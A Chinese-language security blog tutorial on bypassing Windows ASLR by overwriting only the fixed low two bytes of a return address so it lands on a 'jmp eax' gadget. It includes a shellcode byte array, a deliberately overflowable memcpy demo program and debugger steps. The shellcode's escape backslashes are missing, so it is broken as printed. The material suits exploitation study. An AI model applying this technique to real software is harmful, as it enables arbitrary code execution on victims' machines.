Windows下ASLR机制绕过

扫一扫关注公众号，长期致力于安全研究

前言：本文主要讲解ASLR机制根据返回地址来绕过

在windows vista开始后，就启用了地址随机化处理，这样做也是为了程序的安全性，但是还是存在以下缺陷：

虽然模块的加载基址变化了，但是各模块的入口点（Entry 那列）地 址的低位 2 个字节是不变的，也就是说映像随机化只是对加载基址的前 2 个字节做了随机处理。例如，某个模块的入口地址为 0x12345678，那么系统重启的它的入口地址可能会变为 0x43215678，地址的前 2 个字节是随机的，而后两个字节 0x5678 是固定的。

    编译器随机基址开启，一般编译器默认都开启了

既然上面我们已知，前两个字节是随机，后两个字节可控且固定的。那么通过栈溢出到返回地址，找一条jmp指令跳转到shellcode执行。

伪代码思路讲解：

    首先shellcode地址假设存放在esp栈顶

    程序第一次运行的地址 0x66661234  (指令地址是 jmp esp)

    程序第二次运行的地址 0x77771234  (指令地址是 jmp esp)

    两次运行，虽说前两个字节随机，但是后两个字节1234还是不变的，还是可以成功指向到jmp esp的，这就好比 6666为你的地基，地基+1234则是jmp esp指令，而当程序第二次运行的时候，7777为你的地基，地基+1234还是jmp esp指令。

全部代码如下，一个经典的栈溢出，但是采用了地址随机化，最后两个字节"xadxbd"为返回地址处。

char shellcode[] ="xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C""x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53""x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B""x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95""xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59""x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A""xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75""xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03""x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB""x53x68x77x65x73x74x68x66x61x69x6Cx8BxC4x53x50x50""x53xFFx57xFCx53xFFx57xF8x90x90x90x90x90x90x90x90""x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90""x90x90x90""xadxbd";void test(){  printf("shellcode：%d", sizeof(shellcode));  char buf[204] = { 0 };  memcpy(buf, shellcode, sizeof(buf)+6);}int _tmain(int argc, _TCHAR* argv[]){  printf("123123");  test();  return 0;}

OD分析，当执行完memcpy函数之后，eax存放的就是局部变量栈中的shellcode起始位置。 

既然shellcode的地址存放在eax寄存器中，那就覆盖返回地址，覆盖内容为jmp eax，这里通过一个插件寻找

成功找到，0042bdad，既然启用了地址随机化，那么只需要拿后两个字节的值，bdad即可。

当执行到ret的时候，后面的bdad就是写死的值了，不论程序基址怎么变，都不会影响的。

之后F9，成功运行shellcode

在反复正常运行程序，也会成功执行shellcode，成功绕过ASLR

下方扫一下扫，即可关注